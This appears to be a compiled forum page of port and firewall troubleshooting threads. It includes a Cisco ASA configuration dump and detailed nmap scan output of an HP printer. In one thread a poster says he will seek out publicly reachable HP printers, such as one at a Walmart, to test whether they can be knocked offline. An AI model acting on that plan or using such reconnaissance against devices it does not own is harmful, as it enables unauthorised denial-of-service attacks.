WRT1900AC - Open Port - 52147 - Security Vulnerability?

I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com. See port scan screenshot below.
This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
Anyone have an idea what is going on?
Jeff
Incoming log
Source IP address | Destination port number
110.93.76.194 52147
73.52.28.251 52147

Yes, I did setup a Smart Wifi account during initial setup.
It there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (See above)?
I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
UPDATE: I just checked the log again, and there are a dozen or so random IP addesses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
If anyone has any information or insight into this, it would be greatly appreciated.

Similar Messages

Can't update iOS 8 on my iPhone5 through iTunes on Windows 8 (error 3004, 3194). Updated host file, opened port 80, 443; turned off security system and firewall, etc. But nothing works. How to solve this problem?

Can't update iOS 8 on my iPhone5 through iTunes on Windows 8 (error 3004, 3194). Updated host file, opened port 80, 443; turned off security system and firewall, etc. But nothing works. How to solve this problem?

Hi the_mad_movies,
It seems like this article will be the best option for addressing this issue:
Error 3194, Error 17, or "This device isn't eligible for the requested build"
http://support.apple.com/kb/ts4451
Thanks for coming to the Apple Support Communities!
Cheers,
Braden

How do I open ports in Norton Security by Comcast?

How do I open ports in Norton Security by Comcast?

You should ask them or find a forum relating to Norton Security. There's a chance someone here may know but this forum is for Apple TV so you may not get the help you need.

What are the security risks for opening port 80 on workstations?

Hello all,
in our environment, there is an application which open port 80 on workstations when installed, but it is not allowed on preimeter FW
could you please advise what are the security risks for leaving port 80 opened on the workstations? or it is considered secure unless it is not allowed on the preimeter FW?
thanks alot & regards

Hi R.Naguib.
The 80 port is open by default through the firewall on Windows system, it is used by a http protocol by a browser.
As for the network or hardware Firewall settings, I suggest to turn to the network administrator for details.
Regards
Wade Liu
TechNet Community Support

Risk & Security vulnerability for using default ports

Dear All,
As far as I know, Oracle does not recommend to use default ports for
security purposes. Searching out of Oracle community found that some people
think that it does not matter any more. However, it can have some vulnerability
and, I think, security risk & auditors would not like to see that.
I have found that in 2012 ORacle Tns listener port 1521 had a vulnerability
issue with oracle database 11gR1 and 11gR2, but how about Oracle 12?.
Also, I was searching something similiar for Oracle OAM, SOA, OIM, OAAM, but still cannot
find anything.
Thanks
Georgina Acuna-Rivera

Do you happen to have such a storage peripheral attached to your M3000?
If yes, then it is probably reachable through the M3000's IP address. You will need to log a support ticket with HP and get guidance how to get into the array's FCAL controller and investigate the issue.
If you do not have an HP array attached to your M3000, then log a support case with Oracle and arrange for a field service engineer to visit the site to manipulate the password for its `admin` account (since that special account is likely needs service-employee-only access).
Either way, you need to get accurate technical support and this forum is NOT official tech-support.

HT202802 What "security vulnerability" will be opened by using this signing technique?

Regarding article: HT202802
OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
The article says:
Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
1. What "security vulnerability" will be opened by using this signing technique?
2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc. That being said, is this still a vulnerability to my computer?
"Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option."
1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
Thanks for the help in advance!

1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

Opening Ports on Max OS X 10.5.6

I have two PC using Windows XP and one I Mac using Mac OS X 10.5.6 all on different levels.
PC #1 (with the application I am trying to access) is connected to a network with a wireless router.
The wireless router is hooked up to my I Mac.
I keep getting a message related to fire wall protection and the need to open specific ports.
Initially I had the wireless router hooked up to PC #2. I could access the application but the signal was too week and the application could not run properly (got a message indicating this).
The only option I had was to move the wireless router to the Mac.
I now have a great signal but am unable to access the the application.
Anyone know how to open ports with an I Mac when you can't see the application from your Mac?

I was just wondering if by making this router abridge it would make the wireless portion of the network vulnerable to others within the network signal.
No.
Making "2nd router/WiFi" a bridge just means that "home router" is now the only router in your home network, and it is, and always has been, your primary hardware firewall between you and the nasty things that crawl around on the internet.
A "bridge" just passes stuff from one side to the other side without messing with the IP addresses. In many ways it is similar to an ethernet switch, only in this case you are switching from ethernet to WiFi signals.
With a "bridge" instead of having 2 subnets that can not talk to each other, you have a single subnet where all your home computers can see and talk to each other.
Unless you do not trust "PC #1", as that is the only system that is now able to see the stuff on the WiFi side of the D-Link. And of course if you leave an ethernet cable dangling out a window for the neighborhood kids to plug in their laptops
Making "2nd router/WiFi" a bridge does not change your WiFi security. It is what it always was. If you have no WiFi encryption enabled, then you never had security. If you have WEP encryption enabled, you have security that keeps honest neighbors honest, but anyone that wants to break in can do it in a few minutes with software easily avaliable on the net. If you use WPA encryption with a good password, then you are in very good shape, and your WiFi has been and will remain secure (or as secure as is available with today's inexpensive consumer technology).
By the way my router D link DIR-625 is not easy to turn into a bridge.
Based on what I found on the net it's not that simple.
Based on what I found reading the D-Link DIR-625 manual from the web, there is a section which talks about connecting to another router
If you are connecting the D-Link router to another router to use as a wireless access point and/or switch, you will have to do the following before connecting the router to your network:
• Disable UPnP™
• Disable DHCP
• Change the LAN IP address to an available address on your network. The LAN ports on the router cannot accept a DHCP address from your other router.
There are more detailed instructions in the manual, but I figure I shouldn't reprint D-Link's manual in the forum. All I did was a Google search for "d-link DIR-625 manual".
Now it is always possible I got the wrong manual, so your mileage will vary.

Default LaunchDaemons and open ports?

I recently have written a port scanner for a project at my university and after running it, I discovered that a large portion of my Macbooks' well known ports was open.
These were 21 (ftp), 22 (ssh), 23 (telnet), 53 (domain), 79 (finger)!!, 88 (kerberos), 512 (exec)!!, 513 (login), and a bunch of others (see picture below for open ports - afterwards entered @ grc.com).
I checked, if they are reachable from the internet (see picture below). They were not, but that does not say a lot(?), because if someone wanted to make a bot out of my Mac or collect data from it, this person could contact a C&C server from my machine and start communicating without opening any port of the NAT router, as the router allows bidirectional communication if started by the client(?).
I checked, if these ports are reachable from within a local network, by requesting the services behind them from another computer running Linux. And they are! Everyone within the Non-VPN networks of my university was and is able to fetch personal information from me over fingerd! To prevent further leakage, I will block any incoming connections from now on.
> finger user@{Macbook's IP}
same output as when running locally
> finger user@localhost
[localhost]
Trying ::1...
Login: MyUserName Name: MyNameReplaced
Directory: /Users/MyUserName Shell: /usr/local/bin/fish
On since Sun Oct 26 13:02 (CET) on console, idle 7:52 (messages off)
On since Sun Oct 26 17:15 (CET) on ttys000
On since Sun Oct 26 20:25 (CET) on ttys001, idle 0:05
No Mail.
No Plan.
I am able to login to the Mac via telnet over the LAN, etc.
I checked the configuration of my firewall. It is/was activated. Signed software is allowed to accept incoming connections. Cloaking is not activated and I am not blocking every incoming connection. There are five services in the list below, they are all from Apple. I can not remove them. The minus button is grayed out.
When I ticked 'Block all incoming connections', the services behind the ports were no longer detectable/reachable from the LAN, but the daemons are still running on the Mac!
So my question is, why are these daemons running?! Why on earth is the fingerd running or exec?! This seems not normal. Who has started them (software or person)? I strongly limit access to my computer. I always lock it, when leaving it unattended. I use NoScript in Firefox. Never do I open attachments from mails.
I checked the Mac of a friend with my PortScanner (in his LAN and on his Mac) and his has none of the ports open mine has.
I have not checked my ports/firewall for a long time, so I can't remember if those ports were closed at any time before.
Meanwhile I will read something about launchd, to gather more information.

I'm not an expert on this, but I'm not certain what you are concerned about. All messaging in unix systems is done through ports, and so a variety of ports need to be open for normal system operations. OS X out-of-the-box probably strikes a balance between convenience and paranoia - ports that might be more secure closed left open by default so that novice users aren't driven out of their wits - but I can't imagine that it leaves open anything that constitutes a true vulnerability. Or if it does, you should file a bug report.
I'm told every med student suffers from hypochondria at one point or another, and I know that every comp sci student will sooner or later have a short freak-out over security. So take a deep breath...

Help Opening PORT 6112 for WarCraftIII Hosting

I'm trying to help my son use WarCraftIII to host a game in our iMac G5, but no one can join. Successful hosting is supposed to be an issue of opening port 6112 but no success yet.
What I have done so far:
1) Set Linksys BEFSR41 router to forward port 6112 both ways. Contacted blizzard tech support today and they told me I needed to open the port in Linksys router by following instructions at http//:www.portforward.com for my router, and the WarCraft III game (fyi this is a very nice site, anyone with router setting issues should check it out). I went to the site, clicked on "Forward", found my router (Linksys BEFSR41v1.39)in the list below, then found my game WarCraft III in game list and followed instructions at this website: http://www.portforward.com/english/routers/portforwarding/Linksys/BEFSR41v1.40.2/WarcraftIII.htm
2) Opened port 6112 in Mac OS FileSharing FireWall. I'm not so sure I got this part right. I went to System Prefs, File Sharing, FireWall and clicked New. Then I entered 6112 in both TCP and UDP (cause I don't know which it is) and selected Other and gave it the name WarcraftIII1 (used this name, because we were helping a friend set up his router (Linksys WRT54G) to pass 6112, and the portforward.com instructions had us enter that text in Application field for the port forwarding range: http://www.portforward.com/english/routers/portforwarding/Linksys/WRT54G/WarcraftIII.htm So, I figured this was as good a name as any to use in FireWall setting.
Ideas I have not tried yet:
1) Maybe I need to update my Linksys firmware? I noticed that the Portforward instructions were for Linksys firmware 1.40.2 My firmware is 1.39 (going to Linksys site I see there's a newer version v1.46.02 available). So, maybe I need to download and apply (but I don't want to screw up my current router settings - since the work! - and I'm figuring it's likely to lose all current settings with a firmware update).
2) Maybe I need a different name in the FireWall port than "WarcraftIII1"? Maybe one of the pull-down options are what I should have used.
Any help would be greatly appreciated!
iMac G5 Mac OS X (10.4.6) 1.5 Gb RAM

Hey Tim,
Thanks for tip on preparing for firmware update. As it turns out, all settings were wiped when I did the update. But I like the approach of having 'clean' setup before update (sort of like running Disk Utility before and after new sofware installs).
I tried turning off the Mac OS firewall, but it didn't help (so I don't think that's the root cause - but a good thing to test). Part of the www.portforward.com instructions for using my Linksys router with WarCraftIII include setting to DISABLE the "Block WAN Request" option. I don't know much about router security, but this makes me feel more vulnerable. So, I prefer to keep Mac OS firewall enabled, as long as it doesn't get in the way (also MacWorld's most recent issue recommended firewall ON, and activate Advanced settings turning ON options for Block UDP Traffic, and Enable Stealth Mode). Having my firewall set up in this way hasn't been any problem for me at all for past 1.5 yrs, until just recently when I tried hosting WarCraftIII Custom Game (reason I want to do that, is it allows my son to play online against only friends we know - call me overprotective, and I'll happily plead guilty). As a case in point, I was on the Battle.Net USEast Open Tech Support chat channel last night (you get to this from within the WarCraftIII application), asking if someone would do a quick test and join my Custom Game. During that brief interchange, one of the other people on the channel types in all caps "I want to f**k your mother" (without the *'s)". I'm thinking, yeah Custom Game is the way to go, I'd don't want my son out here with the likes of you. Thankfully, someone else agreed to the test. Unfortunately it failed.
I think I've about got it beat though. I found on the blizzard.com support site, a way to use Terminal to run a traceroute by typing (without the quotes) "traceroute us.logon.worldofwarcraft.com > ~/Desktop/tracert.txt" and press the Return key. Previously I was getting all *'s back in the results (which means no recognized connections). Now, I'm getting IP addresses and ms timing for hops so it appears I'm getting through. http://www.blizzard.com/support/wow/?id=aww0827p5
But, I've got to go and won't be able to test ability to join a Custom Game with my son's friend until later tonight.
Thanks again. C

Help open port on ASA5510 (version 8.3)

Hi all,
I configured ASA to open port 21, 3389, 5900 (outside access in) but when i check port just success : 21 and 3389, Error: 5900
If i configured with only one port 5900 or 3389, is't ok, i don't undesrtand what 's the problem?
ASA5510>
ASA5510> ena
Password: ***********************
ASA5510# show run
: Saved
ASA Version 8.3(1)
hostname ASA5510
domain-name lohoi.local
enable password *********************** encrypted
passwd *********************** encrypted
names
interface Ethernet0/0
description Connect_to_Modem
nameif outside
security-level 0
ip address 10.0.0.2 255.255.255.0
interface Ethernet0/1
description Connect_to_Router2911
nameif inside
security-level 100
ip address 172.16.17.2 255.255.255.240
interface Ethernet0/2
shutdown
no na
no security-level
no ip address
interface Ethernet0/3
shutdown
no nameif
no security-level
no ip address
interface Management0/0
description Management
nameif management
security-level 100
ip address 192.168.1.1 255.255.255.0
ftp mode passive
clock timezone ICT 7
dns server-group DefaultDNS
domain-name lohoi.local
object network obj-any
subnet 0.0.0.0 0.0.0.0
object network ftpserver
host 192.168.88.90
description FTP server
object network Remote_Desktop
host 192.168.100.29
object network VNC
host 192.168.100.4
access-list 101 extended permit icmp any any
access-list 101 extended permit icmp any any echo-reply
access-list 101 extended permit tcp any any
access-list outside_access_in extended permit tcp any object ftpserver eq ftp
access-list outside_in extended permit tcp any host 192.168.100.29
access-list outside_in extended permit tcp any host 192.168.100.4
pager lines 24
mtu outside 1500
mtu inside 1500
mtu management 1500
icmp unreachable rate-limit 1 burst
asdm image disk0:/asdm-631.bin
asdm history enable
arp timeout 14400
object network obj-any
nat (inside,outside) dynamic interface
object network ftpserver
nat (inside,outside) static interface service tcp ftp ftp
object network Remote_Desktop
nat (inside,outside) static interface service tcp 3389 3389
object network VNC
nat (inside,outside) static interface service tcp 5900 5900
access-group outside_in in interface outside
route outside 0.0.0.0 0.0.0.0 10.0.0.1 1
route inside 192.168.88.64 255.255.255.224 1
route inside 192.168.100.0 255.255.255.0 172.16.17.1 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
dynamic-access-policy-record DfltAccessPolicy
aaa authentication ssh console LOCAL
http server enable
http 192.168.1.0 255.255.255.0 management
http authentication-certificate inside
http authentication-certificate management
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart
crypto ipsec security-association lifetime seconds 28800
crypto ipsec security-association lifetime kilobytes 4608000
telnet timeout 5
ssh 192.168.100.0 255.255.255.0 inside
ssh timeout 5
console timeout 0
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
webvpn
username admin password *********************** encrypted privilege 15
class-map inspection_default
match default-inspection-traffic
policy-map type inspect dns preset_dns_map
parameters
message-length maximum client auto
message-length maximum 512
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect ip-options
service-policy global_policy global
prompt hostname context
call-home
profile CiscoTAC-1
no active
destination address http https://tools.cisco.com/its/service/oddce/services/DD
CEService
destination address email [email protected]
destination transport-method http
subscribe-to-alert-group diagnostic
subscribe-to-alert-group environment
subscribe-to-alert-group inventory periodic monthly
subscribe-to-alert-group configuration periodic monthly
subscribe-to-alert-group telemetry periodic daily
Cryptochecksum:667cb3ec729681c78ccab9a57abd89df
: end
ASA5510#

ASA5510# show run
: Saved
ASA Version 8.3(1)
hostname ASA5510
domain-name lohoi.local
enable password ****************** encrypted
passwd ****************** encrypted
names
interface Ethernet0/0
description Connect_to_Modem
nameif outside
security-level 0
ip address 10.0.0.2 255.255.255.0
interface Ethernet0/1
description Connect_to_Router2911
nameif inside
security-level 100
ip address 172.16.17.2 255.255.255.240
interface Ethernet0/2
shutdown
no nameif
no security-level
no ip address
interface Ethernet0/3
shutdown
no nameif
no security-level
no ip address
interface Management0/0
description Management
nameif management
security-level 100
ip address 192.168.1.1 255.255.255.0
ftp mode passive
clock timezone ICT 7
dns server-group DefaultDNS
domain-name lohoi.local
object network obj-any
subnet 0.0.0.0 0.0.0.0
object network ftpserver
host 192.168.88.90
description FTP server
object network remote_desktop
host 192.168.100.2
object network remote_vnc
host 192.168.100.4
access-list 101 extended permit icmp any any
access-list 101 extended permit icmp any any echo-reply
access-list 101 extended permit tcp any any
access-list outside_access_in extended permit tcp any object ftpserver eq ftp
access-list outside_access_in extended permit tcp any host 192.168.100.4 eq 5900
access-list outside_access_in extended permit tcp any host 192.168.100.2 eq 3389
pager lines 24
mtu outside 1500
mtu inside 1500
mtu management 1500
icmp unreachable rate-limit 1 burst-size 1
asdm image disk0:/asd
asdm history enable
arp timeout 14400
object network obj-any
nat (inside,outside) dynamic interface
object network ftpserver
nat (inside,outside) static interface service tcp ftp ftp
object network remote_desktop
nat (inside,outside) static interface service tcp 3389 3389
object network remote_vnc
nat (inside,outside) static interface service tcp 5900 5900
access-group outside_access_in in interface outside
route outside 0.0.0.0 0.0.0.0 10.0.0.1 1
route inside 192.168.88.64 255.255.255.224 172.16.17.1 1
route inside 192.168.100.0 255.255.255.0 172.16.17.1 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
dynamic-access-policy-record DfltAccessPolicy
aaa authentication ssh console LOCAL
http server enable
http 192.168.1.0 255.255.255.0 management
http authentication-certificate inside
http authentication-certificate management
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart
crypto ipsec security-association lifetime seconds 28800
crypto ipsec security-association lifetime kilobytes 4608000
telnet timeout 5
ssh 192.168.100.0 255.255.255.0 inside
ssh timeout 5
console timeout 0
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
webvpn
username admin password ****************** encrypted privilege 15
class-map inspection_default
match default-inspection-traffic
policy-map type inspect dns preset_dns_map
parameters
message-length maximum client auto
message-length maximum 512
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect ip-options
service-policy global_policy global
prompt hostname context
call-home
profile CiscoTAC-1
no active
destination address http https://tools.cisco.com/its/service/oddce/services/DD
CEService
destination address email [email protected]
destination transport-method http
subscribe-to-alert-group diagnostic
subscribe-to-alert-group environment
subscribe-to-alert-group inventory periodic monthly
subscribe-to-alert-group configuration periodic monthly
subscribe-to-alert-group telemetry periodic daily
Cryptochecksum:4f061a213185354518601f754e41494c
: end
ASA5510#
So i configured again, but i'm not to access to 5900 port

Open port issues with Direct Print functionality

Hi, I have been fighting with HP call support about the Photosmart 7525 printer.
Originally I setup and had performed all the functions to enable both web support and WIFI.
Within an hour the printer would not respond to wireless communication, though it had its wireless indecator showing it was connected.
I was told by HP support that the issue will be resolved in March, as there will be a firmware update to fix the issue.
Now that I had the printer install the new firmware I still get the issue.
Though I found through some sniffing, that there are a number of ports enabled and open that are over and beyond print requirements.
Funny thing I can send my printer into instant lockup with all lights flashing with a simple UDP ping sniff. I would think I can do this with other new HP printers using Eprint functions. I will find HP web based printers that are open for public printing and test my theory that HP Eprinters are open to hacking and denyal of service attempts. My Hp print app on andriod list three in my area, and one is at my local Walmart. This would be cool to find this, as I am usually not the first to point such matters out.
I assume some are for Apple devices to print.
Here is my sniffing report:
Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 07:57 Central Daylight TimeNSE: Loaded 110 scripts for scanning.NSE: Script Pre-scanning.Initiating ARP Ping Scan at 07:57Scanning 192.168.223.1 [1 port]Completed ARP Ping Scan at 07:57, 0.23s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 07:57Completed Parallel DNS resolution of 1 host. at 07:58, 16.50s elapsedInitiating SYN Stealth Scan at 07:58Scanning 192.168.223.1 [1000 ports]Discovered open port 445/tcp on 192.168.223.1Discovered open port 139/tcp on 192.168.223.1Discovered open port 80/tcp on 192.168.223.1Discovered open port 443/tcp on 192.168.223.1Discovered open port 8080/tcp on 192.168.223.1Discovered open port 9220/tcp on 192.168.223.1Discovered open port 6839/tcp on 192.168.223.1Discovered open port 631/tcp on 192.168.223.1Discovered open port 7435/tcp on 192.168.223.1Discovered open port 8089/tcp on 192.168.223.1Discovered open port 9100/tcp on 192.168.223.1Completed SYN Stealth Scan at 07:58, 1.71s elapsed (1000 total ports)Initiating UDP Scan at 07:58Scanning 192.168.223.1 [1000 ports]Discovered open port 5353/udp on 192.168.223.1Completed UDP Scan at 07:58, 1.82s elapsed (1000 total ports)Initiating Service scan at 07:58Scanning 20 services on 192.168.223.1Discovered open port 161/udp on 192.168.223.1Discovered open|filtered port 161/udp on 192.168.223.1 is actually open
Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 07:51 Central Daylight TimeNmap scan report for 192.168.223.1Host is up (0.0025s latency).Not shown: 93 closed portsPORT     STATE SERVICE     VERSION80/tcp   open http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)139/tcp open tcpwrapped443/tcp open ssl/http    HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)445/tcp open netbios-ssn631/tcp open http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)8080/tcp open http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)9100/tcp open jetdirect?MAC Address: A03:C1:BD:C8:34 (Unknown)Device type: printer|general purposeRunning: HP embedded, Wind River VxWorksOS CPE: cpe:/h:hp:laserjet_cm1415fnw cpe:/h:hp:laserjet_cp1525nw cpe:/h:hp:laserjet_1536dnf cpe:/o:windriver:vxworksOS details: HP LaserJet CM1415fnw, CP1525nw, or 1536dnf printer, VxWorksNetwork Distance: 1 hopService Info: Device: printer; CPE: cpe:/h:hphotosmart_7520OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 34.11 seconds

OK now I am able to run a full scan on TCP ports without causing a lock up of the printer.
I found that having the printer connect to a router that has been setup to use channel 5, 6 or 7 will cause port scanning issues with the printer.
It is obvious that there are 18 ports that are seen as open, whether they are used or not. Two of which are active but have no service connected to them. Some are just dead like port 25, but over half are active enough to recieve data and lock network connectivity within the printer.
As the firmware states some other laser jets may be affected depending on how the configuration can be set.
I moved my routers channel to channel 1 as it is the only other option I have in a highly congested location. It is not as good as channel 6, but the printer seems to have channel 6 locked in for direct printing.
Here is the latest full scan with UDP enabled, it is the furthest and most complete scan I am able to complete, with UDP ports enabled. The TCP port scan has a bit more and I have placed a simple list below the information given here:
Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 13:27 Central Daylight Time
NSE: Loaded 110 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 13:27
Scanning 192.168.1.211 [1 port]
Completed ARP Ping Scan at 13:27, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:27
Completed Parallel DNS resolution of 1 host. at 13:27, 0.03s elapsed
Initiating SYN Stealth Scan at 13:27
Scanning 192.168.1.211 [1000 ports]
Discovered open port 443/tcp on 192.168.1.211
Discovered open port 80/tcp on 192.168.1.211
Discovered open port 139/tcp on 192.168.1.211
Discovered open port 8080/tcp on 192.168.1.211
Discovered open port 445/tcp on 192.168.1.211
Discovered open port 631/tcp on 192.168.1.211
Discovered open port 9100/tcp on 192.168.1.211
Discovered open port 7435/tcp on 192.168.1.211
Discovered open port 9220/tcp on 192.168.1.211
Discovered open port 6839/tcp on 192.168.1.211
Completed SYN Stealth Scan at 13:27, 5.25s elapsed (1000 total ports)
Initiating UDP Scan at 13:27
Scanning 192.168.1.211 [1000 ports]
Discovered open port 137/udp on 192.168.1.211
Completed UDP Scan at 13:27, 4.46s elapsed (1000 total ports)
Initiating Service scan at 13:27
Scanning 16 services on 192.168.1.211
Discovered open port 161/udp on 192.168.1.211
Discovered open|filtered port 161/udp on 192.168.1.211 is actually open
Completed Service scan at 13:29, 82.51s elapsed (17 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.211
NSE: Script scanning 192.168.1.211.
Initiating NSE at 13:29
Completed NSE at 13:30, 82.29s elapsed
Nmap scan report for 192.168.1.211
Host is up (0.023s latency).
Not shown: 1983 closed ports
PORT     STATE         SERVICE      VERSION
80/tcp   open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
|_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
| http-methods: GET POST PUT DELETE
| Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open          tcpwrapped
443/tcp open          ssl/http     HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
|_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
| http-methods: GET POST PUT DELETE
| Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=HPPS7525/organizationName=HP/stateOrProvinceName=Washington/countryName=US
| Issuer: commonName=HPPS7525/organizationName=HP/stateOrProvinceName=Washington/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-02-25T10:12:24+00:00
| Not valid after: 2034-02-20T10:12:24+00:00
| MD5:   9144 ca3b 557e 09cc aba0 8387 2732 2375
|_SHA-1: a6b2 95c0 b72a 7201 578c 32de 662a e6fe b082 48ca
|_ssl-date: 2014-03-21T13:30:09+00:00; -4h59m12s from local time.
445/tcp open          netbios-ssn
631/tcp open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
| http-methods: GET POST PUT DELETE
| Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
6839/tcp open          tcpwrapped
7435/tcp open          tcpwrapped
8080/tcp open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
|_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
| http-methods: GET POST PUT DELETE
| Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
9100/tcp open          jetdirect?
9220/tcp open          hp-gsg       HP Generic Scan Gateway 1.0
137/udp open          netbios-ns   Samba nmbd (workgroup: HPPS7525)
138/udp open|filtered netbios-dgm
161/udp open          snmp         SNMPv1 server (public)
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
| snmp-interfaces:
|   Wifi0
|     IP address: 192.168.1.211 Netmask: 255.255.255.0
|     MAC address: a0:d3:c1:bd:c8:32 (Unknown)
|     Type: ethernetCsmacd Speed: 10 Mbps
|     Status: up
|_    Traffic stats: 6.16 Mb sent, 3.43 Mb received
| snmp-netstat:
|   TCP 0.0.0.0:7435         0.0.0.0:0
|   TCP 192.168.1.211:56076 15.201.145.52:5222
|   UDP 0.0.0.0:3702         *:*
|   UDP 127.0.0.1:666        *:*
|_ UDP 192.168.223.1:67     *:*
| snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT
|_ System uptime: 0 days, 3:34:23.28 (1286328 timeticks)
| snmp-win32-shares:
|_ baseoid: 1.3.6.1.4.1.77.1.2.27
1022/udp open|filtered exp2
1023/udp open|filtered unknown
3702/udp open|filtered ws-discovery
5355/udp open|filtered llmnr
MAC Address: A03:C1:BD:C8:32 (Unknown)
Device type: general purpose
Running: Wind River VxWorks
OS CPE: cpe:/o:windriver:vxworks
OS details: VxWorks
Uptime guess: 0.150 days (since Fri Mar 21 09:55:04 2014)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Hosts: HPA0D3C1BDC832, HPPS7525; Device: printer; CPE: cpe:/h:hphotosmart_7520
Host script results:
| nbstat:
|   NetBIOS name: HPA0D3C1BDC832, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     HPA0D3C1BDC832<00>   Flags: <unique><active><permanent>
|     MSHOME<00>           Flags: <group><active><permanent>
|     HPA0D3C1BDC832<20>   Flags: <unique><active><permanent>
|     HPPS7525<00>         Flags: <unique><active><permanent>
|_    HPPS7525<20>         Flags: <unique><active><permanent>
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT      ADDRESS
1   23.26 ms 192.168.1.211
NSE: Script Post-scanning.
Read data files from: F:\Progs\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.90 seconds
           Raw packets sent: 2030 (74.829KB) | Rcvd: 2921 (149.377KB)
+++++++++++++++++++++++++++++++++++++++++++++++++++++===
Full TCP port scan without UDP scanning of all ports, showing up as open... * designates open and active.
192.168.223.1Discovered open port 25/tcp on
*192.168.223.1Discovered open port 80/tcp on
*192.168.223.1Discovered open port 110/tcp on
*192.168.223.1Discovered open port 119/tcp on
*192.168.223.1Discovered open port 139/tcp on
192.168.223.1Discovered open port 143/tcp on
*192.168.223.1Discovered open port 443/tcp on
*192.168.223.1Discovered open port 445/tcp on
192.168.223.1Discovered open port 465/tcp on
